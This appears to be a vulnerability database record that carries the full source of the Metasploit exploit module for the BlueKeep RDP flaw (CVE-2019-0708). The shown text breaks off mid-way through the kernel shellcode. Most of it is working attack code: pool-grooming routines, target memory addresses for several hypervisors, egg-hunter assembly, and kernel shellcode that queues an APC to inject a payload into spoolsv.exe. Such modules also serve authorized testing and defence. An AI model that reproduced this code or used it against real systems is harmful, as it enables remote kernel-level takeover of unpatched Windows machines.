"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb"}, {"lastseen": "2020-11-21T16:52:33", "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution. Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets. Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set! If the target is crashing regardless, you will likely need to determine the non-paged pool base in kernel memory and set it as the GROOMBASE option.\n", "published": "2019-09-19T11:05:08", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Exploitation and Caveats from zerosum0x0:\n#\n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.\n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)\n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.\n# 4. RDP has chunked messages, so we use this to groom.\n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.\n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.\n# i. RDPSND only works when\n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0\n# ii. This registry key is not a default setting for server 2008 R2.\n# We should use alternate groom channels or at least detect the\n# channel in advance.\n# 5. Use chunked grooming to fit new data in the freed channel, account for\n# the allocation header size (like 0x38 I think?). At offset 0x100? is where\n# the \"call [rax]\" gadget will get its pointer from.\n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7\n# i. Hot-swap memory is another problem because, with certain VMWare and\n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP\n# start. This can be anywhere from 100 mb to gigabytes of offset\n# before the NPP start.\n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB\n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need\n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an\n# indirect call\n# d. We are limited to 0x400 payloads by channel chunk max size. My\n# current shellcode is a twin shellcode with eggfinders. I spam the\n# kernel payload and user payload, and if user payload is called first it\n# will egghunt for the kernel payload.\n# 6. After channel hole is filled and the NPP is spammed up with shellcode,\n# trigger the free by closing the socket.\n#\n# TODO:\n# * Detect OS specifics / obtain memory leak to determine NPP start address.\n# * Write the XP/2003 portions grooming MS_T120.\n# * Detect if RDPSND grooming is working or not?\n# * Expand channels besides RDPSND/MS_T120 for grooming.\n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/\n#\n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming\n# MS_T120 on XP... should be same process as the RDPSND\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking\n\n USERMODE_EGG = 0xb00dac0fefe31337\n KERNELMODE_EGG = 0xb00dac0fefe42069\n\n CHUNK_SIZE = 0x400\n HEADER_SIZE = 0x48\n\n include Msf::Exploit::Remote::RDP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',\n 'Description' => %q(\n The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.\n ),\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit\n 'Ryan Hanson', # @ryHanson - Original exploit\n 'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module\n 'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-0708'],\n ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],\n ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html']\n ],\n 'DefaultOptions' =>\n {\n 'RDP_CLIENT_NAME' => 'ethdev',\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => CHUNK_SIZE - HEADER_SIZE,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Automatic targeting via fingerprinting',\n {\n 'Arch' => [ARCH_X64],\n 'FingerprintOnly' => true\n },\n ],\n #\n #\n # Windows 2008 R2 requires the following registry change from default:\n #\n # [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd]\n # \"fDisableCam\"=dword:00000000\n #\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8003800000,\n 'GROOMSIZE' => 100\n }\n ],\n [\n # This works with Virtualbox 6\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8002407000\n }\n ],\n [\n # This address works on VMWare 14\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8030c00000\n }\n ],\n [\n # This address works on VMWare 15\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018C00000\n }\n ],\n [\n # This address works on VMWare 15.1\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8102407000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8004428000\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-05-14',\n 'Notes' =>\n {\n 'AKA' => ['Bluekeep']\n }\n ))\n\n register_advanced_options(\n [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),\n OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),\n OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),\n OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])\n ]\n )\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n if target['FingerprintOnly']\n fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !')\n end\n\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n is_rdp, server_selected_proto = rdp_check_protocol\n unless is_rdp\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us\n # from exploiting the target.\n if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)\n fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n end\n\n chans = [\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ]\n\n @mst120_chan_id = 1004 + chans.length - 1\n\n unless rdp_negotiate_security(chans, server_selected_proto)\n fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')\n end\n\n rdp_establish_session\n\n rdp_dispatch_loop\n end\n\nprivate\n\n # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is\n # received on a channel, and this is when we need to kick off our exploit.\n def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)\n # We have to do the default behaviour first.\n super(pkt, user, chan_id, flags, data)\n\n groom_size = datastore['GROOMSIZE']\n pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)\n groom_chan_count = datastore['GROOMCHANNELCOUNT']\n\n payloads = create_payloads(pool_addr)\n\n print_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\")\n\n target_channel_id = chan_id + 1\n\n spray_buffer = create_exploit_channel_buffer(pool_addr)\n spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)\n free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80\n\n # if the exploit is cancelled during the free, target computer will explode\n print_warning(\"<---------------- | Entering Danger Zone | ---------------->\")\n\n print_status(\"Surfing channels ...\")\n rdp_send(spray_channel * 1024)\n rdp_send(free_trigger)\n\n chan_surf_size = 0x421\n spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min\n chan_surf_packet = spray_channel * spray_packets\n chan_surf_count = chan_surf_size / spray_packets\n\n chan_surf_count.times do\n rdp_send(chan_surf_packet)\n end\n\n print_status(\"Lobbing eggs ...\")\n\n groom_mb = groom_size * 1024 / payloads.length\n\n groom_start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n\n groom_mb.times do |current_groom_count|\n tpkts = ''\n for c in 0..groom_chan_count\n payloads.each do |p|\n tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)\n end\n end\n rdp_send(tpkts)\n\n # tasks we do every 1 MB\n if current_groom_count % (1024 / payloads.length) == 0\n\n # adding mouse move events keeps the connection alive\n # (this handles a groom duration > 30 seconds, such as over Internet/VPN)\n rdp_move_mouse\n\n # simulate slow connection if GROOMDELAY is set\n if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0\n sleep(datastore['GROOMDELAY'])\n end\n\n groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n groom_elapsed_time = groom_current_time - groom_start_time\n groom_elapsed_str = \"%02d:%02d:%02d\" % [groom_elapsed_time / 3600,\n groom_elapsed_time / 60%60,\n groom_elapsed_time % 60]\n\n groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1\n vprint_status(\"Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})\")\n end\n end\n\n # Terminating and disconnecting forces the USE\n print_status(\"Forcing the USE of FREE'd object ...\")\n\n # target is groomed, the early cancellation dangers are complete\n print_warning(\"<---------------- | Leaving Danger Zone | ---------------->\")\n rdp_terminate\n rdp_disconnect\n end\n\n # Helper function to create the kernel mode payload and the usermode payload with\n # the egg hunter prefix.\n def create_payloads(pool_address)\n begin\n [kernel_mode_payload, user_mode_payload].map { |p|\n [\n pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg\n p\n ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\")\n }\n rescue => ex\n print_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\")\n end\n end\n\n def assemble_with_fixups(asm)\n # Rewrite all instructions of form 'lea reg, [rel label]' as relative\n # offsets for the instruction pointer, since metasm's 'ModRM' parser does\n # not grok that syntax.\n lea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/\n asm.gsub!(lea_rel) do |match|\n match = \"lea #{$1}, [rip + #{$2}]\"\n end\n\n # metasm encodes all rep instructions as repnz\n # https://github.com/jjyg/metasm/pull/40\n asm.gsub!(/rep+\\smovsb/, 'db 0xf3, 0xa4')\n\n encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded\n\n # Fixup above rewritten instructions with the relative label offsets\n encoded.reloc.each do |offset, reloc|\n target = reloc.target.to_s\n if encoded.export.key?(target)\n # Note: this assumes the address we're fixing up is at the end of the\n # instruction. This holds for 'lea' but if there are other fixups\n # later, this might need to change to account for specific instruction\n # encodings\n if reloc.type == :i32\n instr_offset = offset + 4\n elsif reloc.type == :i16\n instr_offset = offset + 2\n end\n encoded.fixup(target => encoded.export[target] - instr_offset)\n else\n raise \"Unknown symbol '#{target}' while resolving relative offsets\"\n end\n end\n encoded.fill\n encoded.data\n end\n\n # The user mode payload has two parts. The first is an egg hunter that searches for\n # the kernel mode payload. The second part is the actual payload that's invoked in\n # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel\n # and user mode payloads around the heap in different packets because we don't have\n # enough space to put them both in the same chunk. Given that code exec can result in\n # landing on the user land payload, the egg is used to go to a kernel payload.\n def user_mode_payload\n\n asm = %Q^\n_start:\n lea rcx, [rel _start]\n mov r8, 0x#{KERNELMODE_EGG.to_s(16)}\n_egg_loop:\n sub rcx, 0x#{CHUNK_SIZE.to_s(16)}\n sub rax, 0x#{CHUNK_SIZE.to_s(16)}\n mov rdx, [rcx - 8]\n cmp rdx, r8\n jnz _egg_loop\n jmp rcx\n ^\n egg_loop = assemble_with_fixups(asm)\n\n # The USERMODE_EGG is required at the start as well, because the exploit code\n # assumes the tag is there, and jumps over it to find the shellcode.\n [\n USERMODE_EGG,\n egg_loop,\n USERMODE_EGG,\n payload.raw\n ].pack('<Qa*<Qa*')\n end\n\n def kernel_mode_payload\n\n # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya\n #\n # This shellcode was written originally for eternalblue exploits\n # eternalblue_exploit7.py and eternalblue_exploit8.py\n #\n # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)\n #\n # Note:\n # - The userland shellcode is run in a new thread of system process.\n # If userland shellcode causes any exception, the system process get killed.\n # - On idle target with multiple core processors, the hijacked system call\n # might take a while (> 5 minutes) to get called because the system\n # call may be called on other processors.\n # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.\n # This is ok because some Windows functions do not require a shadow stack.\n # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.\n # Note: the Windows 8 version macros are removed below\n # - The userland payload MUST be appened to this shellcode.\n #\n # References:\n # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)\n # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c\n\n data_kapc_offset = 0x30\n\n data_hal_original_syscall_shadow_common_offset_offset = 0x20\n data_hal_fake_syscall_spinlock_offset = 0x10\n\n data_nt_kernel_addr_offset = 0x8\n data_origin_syscall_offset = 0\n data_peb_addr_offset = -0x10\n data_queueing_kapc_offset = -0x8\n hal_heap_storage = 0xffffffffffd04100\n\n # These hashes are not the same as the ones used by the\n # Block API so they have to be hard-coded.\n createthread_hash = 0x835e515e\n keinitializeapc_hash = 0x6d195cc4\n keinsertqueueapc_hash = 0xafcc4634\n psgetcurrentprocess_hash = 0xdbf47c78\n psgetprocessid_hash = 0x170114e1\n psgetprocessimagefilename_hash = 0x77645f3f\n psgetprocesspeb_hash = 0xb818b848\n psgetthreadteb_hash = 0xcef84c3e\n spoolsv_exe_hash = 0x3ee083d8\n zwallocatevirtualmemory_hash = 0x576e99ea\n\n asm = %Q^\nshellcode_start:\n ; egg tag\n nop\n nop\n nop\n nop\n\nsetup_syscall_shadow_hook:\n ; IRQL is PASSIVE_LEVEL when got code execution\n ;int 0x3\n\n mov rbp, #{hal_heap_storage}\n\n ; allow interrupts while executing shellcode\n sti\n call r3_to_r0_start\n cli\n\n ;--------------------- HACK crappy thread cleanup --------------------\n ; This code is effectively the same as the epilogue of the function that calls\n ; the vulnerable function in the kernel, with a tweak or two.\n ; TODO: make the lock not suck!!\n mov rax, qword [gs:0x188]\n add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++\n lea r11, [rsp+0b8h]\n xor eax, eax\n mov rbx, [r11+30h]\n mov rbp, [r11+40h]\n mov rsi, [r11+48h]\n mov rsp, r11\n pop r15\n pop r14\n pop r13\n pop r12\n pop rdi\n ret\n\nr3_to_r0_start:\n ; save used non-volatile registers\n push r15\n push r14\n push rdi\n push rsi\n push rbx\n push rax ; align stack by 0x10\n\n ;======================================\n ; find nt kernel address\n ;======================================\n mov r15, qword [gs:0x38] ; get IdtBase of KPCR\n mov r15, qword [r15 + 0x4] ; get ISR address\n shr r15, 0xc ; strip to page size\n shl r15, 0xc\n\n_x64_find_nt_walk_page:\n sub r15, 0x1000 ; walk along page size\n cmp word [r15], 0x5a4d ; 'MZ' header\n jne _x64_find_nt_walk_page\n\n ; save nt address for using in KernelApcRoutine\n mov [rbp+#{data_nt_kernel_addr_offset}], r15\n\n ;======================================\n ; get current EPROCESS and ETHREAD\n ;======================================\n mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR\n mov edi, #{psgetcurrentprocess_hash}\n call win_api_direct\n xchg rcx, rax ; rcx = EPROCESS\n\n ; r15 : nt kernel address\n ; r14 : ETHREAD\n ; rcx : EPROCESS\n\n ;======================================\n ; find offset of EPROCESS.ImageFilename\n ;======================================\n mov edi, #{psgetprocessimagefilename_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)\n mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename\n\n\n ;======================================\n ; find offset of EPROCESS.ThreadListHead\n ;======================================\n ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)\n ; if offset of ImageFilename is more than 0x400, current is (Win8+)\n\n cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename\n jb _find_eprocess_threadlist_offset_win7\n add eax, 0x10\n_find_eprocess_threadlist_offset_win7:\n lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead\n\n ;======================================\n ; find offset of ETHREAD.ThreadListEntry\n ;======================================\n\n lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead\n mov r9, r8\n\n ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700\n_find_ethread_threadlist_offset_loop:\n mov r9, qword [r9]\n\n cmp r8, r9 ; check end of list\n je _insert_queue_apc_done ; not found !!!\n\n ; if (r9 - r14 < 0x700) found\n mov rax, r9\n sub rax, r14\n cmp rax, 0x700\n ja _find_ethread_threadlist_offset_loop\n sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)\n\n\n ;======================================\n ; find offset of EPROCESS.ActiveProcessLinks\n ;======================================\n mov edi, #{psgetprocessid_hash}\n call get_proc_addr\n mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)\n add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)\n\n\n ;======================================\n ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock\n ;======================================\n ; check process name\n\n\n xor eax, eax ; HACK to exit earlier if process not found\n\n_find_target_process_loop:\n lea rsi, [rcx+rbx]\n\n push rax\n call calc_hash\n cmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\"\n pop rax\n jz found_target_process\n\n;---------- HACK PROCESS NOT FOUND start -----------\n inc rax\n cmp rax, 0x300 ; HACK not found!\n jne _next_find_target_process\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n\n jmp _r3_to_r0_done\n\n;---------- HACK PROCESS NOT FOUND end -----------\n\n_next_find_target_process:\n ; next process\n mov rcx, [rcx+rdi]\n sub rcx, rdi\n jmp _find_target_process_loop\n\n\nfound_target_process:\n ; The allocation for userland payload will be in KernelApcRoutine.\n ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()\n\n ;======================================\n ; save process PEB for finding CreateThread address in kernel KAPC routine\n ;======================================\n mov edi, #{psgetprocesspeb_hash}\n ; rcx is EPROCESS. no need to set it.\n call win_api_direct\n mov [rbp+#{data_peb_addr_offset}], rax\n\n\n ;======================================\n ; iterate ThreadList until KeInsertQueueApc() success\n ;======================================\n ; r15 = nt\n ; r14 = -(offset of ETHREAD.ThreadListEntry)\n ; rcx = EPROCESS\n ; edx = offset of EPROCESS.ThreadListHead\n\n\n lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n mov rbx, rsi ; use rbx for iterating thread\n\n ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.\n ; Moreover, alertable thread need to be waiting state which is more difficult to check.\n ; try queueing APC then check KAPC member is more reliable.\n\n_insert_queue_apc_loop:\n ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front\n mov rbx, [rbx+8]\n\n cmp rsi, rbx\n je _insert_queue_apc_loop ; skip list head\n\n ; find start of ETHREAD address\n ; set it to rdx to be used for KeInitializeApc() argument too\n lea rdx, [rbx + r14] ; ETHREAD\n\n ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.\n ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.\n ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.\n ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.\n ; Teb member is next to Queue member.\n mov edi, #{psgetthreadteb_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)\n cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL\n je _insert_queue_apc_loop\n\n ; KeInitializeApc(PKAPC,\n ; PKTHREAD,\n ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),\n ; PKKERNEL_ROUTINE = kernel_apc_routine,\n ; PKRUNDOWN_ROUTINE = NULL,\n ; PKNORMAL_ROUTINE = userland_shellcode,\n ; KPROCESSOR_MODE = UserMode (1),\n ; PVOID Context);\n lea rcx, [rbp+#{data_kapc_offset}] ; PAKC\n xor r8, r8 ; OriginalApcEnvironment\n lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine\n push rbp ; context\n push 1 ; UserMode\n push rbp ; userland shellcode (MUST NOT be NULL)\n push r8 ; NULL\n sub rsp, 0x20 ; shadow stack\n mov edi, #{keinitializeapc_hash}\n call win_api_direct\n ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later\n\n ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);\n ; SystemArgument1 is second argument in usermode code (rdx)\n ; SystemArgument2 is third argument in usermode code (r8)\n lea rcx, [rbp+#{data_kapc_offset}]\n ;xor edx, edx ; no need to set it here\n ;xor r8, r8 ; no need to set it here\n xor r9, r9\n mov edi, #{keinsertqueueapc_hash}\n call win_api_direct\n add rsp, 0x40\n ; if insertion failed, try next thread\n test eax, eax\n jz _insert_queue_apc_loop\n\n mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry\n ; EPROCESS pointer 8 bytes\n ; InProgressFlags 1 byte\n ; KernelApcPending 1 byte\n ; if success, UserApcPending MUST be 1\n cmp byte [rax+0x1a], 1\n je _insert_queue_apc_done\n\n ; manual remove list without lock\n mov [rax], rax\n mov [rax+8], rax\n jmp _insert_queue_apc_loop\n\n_insert_queue_apc_done:\n ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.\n\n_r3_to_r0_done:\n pop rax\n pop rbx\n pop rsi\n pop rdi\n pop r14\n pop r15\n ret\n\n;========================================================================\n; Call function in specific module\n;\n; All function arguments are passed as calling normal function with extra register arguments\n; Extra Arguments: r15 = module pointer\n; edi = hash of target function name\n;========================================================================\nwin_api_direct:\n call get_proc_addr\n jmp rax\n\n\n;========================================================================\n; Get function address in specific module\n;\n; Arguments: r15 = module pointer\n; edi = hash of target function name\n; Return: eax = offset\n;========================================================================\nget_proc_addr:\n ; Save registers\n push rbx\n push rcx\n push rsi ; for using calc_hash\n\n ; use rax to find EAT\n mov eax, dword [r15+60] ; Get PE header e_lfanew\n mov eax, dword [r15+rax+136] ; Get export tables RVA\n\n add rax, r15\n push rax ; save EAT\n\n mov ecx, dword [rax+24] ; NumberOfFunctions\n mov ebx, dword [rax+32] ; FunctionNames\n add rbx, r15\n\n_get_proc_addr_get_next_func:\n ; When we reach the start of the EAT (we search backwards), we hang or crash\n dec ecx ; decrement NumberOfFunctions\n mov esi, dword [rbx+rcx*4] ; Get rva of next module name\n add rsi, r15 ; Add the modules base address\n\n call calc_hash\n\n cmp eax, edi ; Compare the hashes\n jnz _get_proc_addr_get_next_func ; try the next function\n\n_get_proc_addr_finish:\n pop rax ; restore EAT\n mov ebx, dword [rax+36]\n add rbx, r15 ; ordinate table virtual address\n mov cx, word [rbx+rcx*2] ; desired functions ordinal\n mov ebx, dword [rax+28] ; Get the function addresses table rva\n add rbx, r15 ; Add the modules base address\n mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA\n add rax, r15 ; Add the modules base address to get the functions actual VA\n\n pop rsi\n pop rcx\n pop rbx\n ret\n\n;========================================================================\n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.\n;\n; Argument: rsi = string to hash\n; Clobber: rsi\n; Return: eax = hash\n;========================================================================\ncalc_hash:\n push rdx\n xor eax, eax\n cdq\n_calc_hash_loop:\n lodsb ; Read in the next byte of the ASCII string\n ror edx, 13 ; Rotate right our hash value\n add edx, eax ; Add the next byte of the string\n test eax, eax ; Stop when found NULL\n jne _calc_hash_loop\n xchg edx, eax\n pop rdx\n ret\n\n\n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.\n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().\n; 